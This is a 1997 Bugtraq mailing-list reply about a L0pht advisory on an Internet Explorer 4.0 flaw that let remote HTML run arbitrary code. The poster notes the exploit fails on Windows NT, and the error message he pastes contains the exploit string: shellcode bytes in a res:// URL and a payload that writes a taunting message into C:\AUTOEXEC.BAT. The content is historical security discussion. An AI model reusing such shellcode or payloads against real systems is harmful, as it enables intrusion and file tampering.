[5553] in bugtraq
Re: L0pht Advisory: IE4.0
daemon@ATHENA.MIT.EDU (David LeBlanc)
Tue Nov 11 01:55:02 1997
Date: Mon, 10 Nov 1997 22:54:55 -0500
Reply-To: David LeBlanc <dleblanc@MINDSPRING.COM>
From: David LeBlanc <dleblanc@MINDSPRING.COM>
X-To: DilDog <dildog@L0PHT.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.BSI.3.96.971110154003.9894B-100000@c0re.l0pht.com>
At 03:43 PM 11/10/97 -0500, DilDog wrote:
> Document: L0pht Security Advisory
> URL Origin: http://l0pht.com/advisories.html
> Release Date: November 1st, 1997
> Application: Microsoft Internet Explorer 4.0 Suite
> Severity: Viewing remote HTML content can execute arbitrary nat=
ive
code
> Author: dildog@l0pht.com
> Operating Sys: Windows 95
>
>----------------------------------------------------------------------=
-----
---
Hmmm - all it does on NT is:
Internet Explorer cannot open the Internet site
res://=B8=C4A=D8=80-=80=80=80=80=90=90=90=90=90=90=8B=D83=C9=80=C1=AA =D9=
=B1_ =80=E2 =88 C=E2=F6=90=90=90=90=90P=90=90j =90=90=90=BA=ED=C2X =81=
=EA =90R=BB=B7=F2=F7=BF=80=EF
=80=FF=D3ZZP=90=903=DB=B3 S=83=EB SP=BB=E0=80=F9=BF=FF=D3=83=EC =90XP3=DB=
=B39S=BB =D2=E7 =81=EB =90 SP=BB=B0=CA=F9=BF=FF=D3=83=C4 =90=90=90=90=BB=
=CF=80=F9=BF=FF=D3=90=90=90=BB=B0=AF
=F8=BF=FF=D3=90=90=90=CC=CC-------------C:\AUTOEXEC.BAT=80=8D ECHO MICR=
O$OFT 0WNZ YOU... REPENT
AND BE SAVED!=8D PAUSE=8D =80----------------AAAABBBBC =BE=BFDDDED=C1W=
/
The filename or extension is too long.
Of course, you did say it applied to Win95...
OTOH, I'm _really_ disappointed - I've been hearing that since I was
running IE 4.0 that I could be owned. Thought for a minute or two that=
I
might need to start using netcat as my browser.
David LeBlanc |Why would you want to have your desktop user,
dleblanc@mindspring.com |your mere mortals, messing around with a 32-bi=
t
|minicomputer-class computing environment?
|Scott McNealy
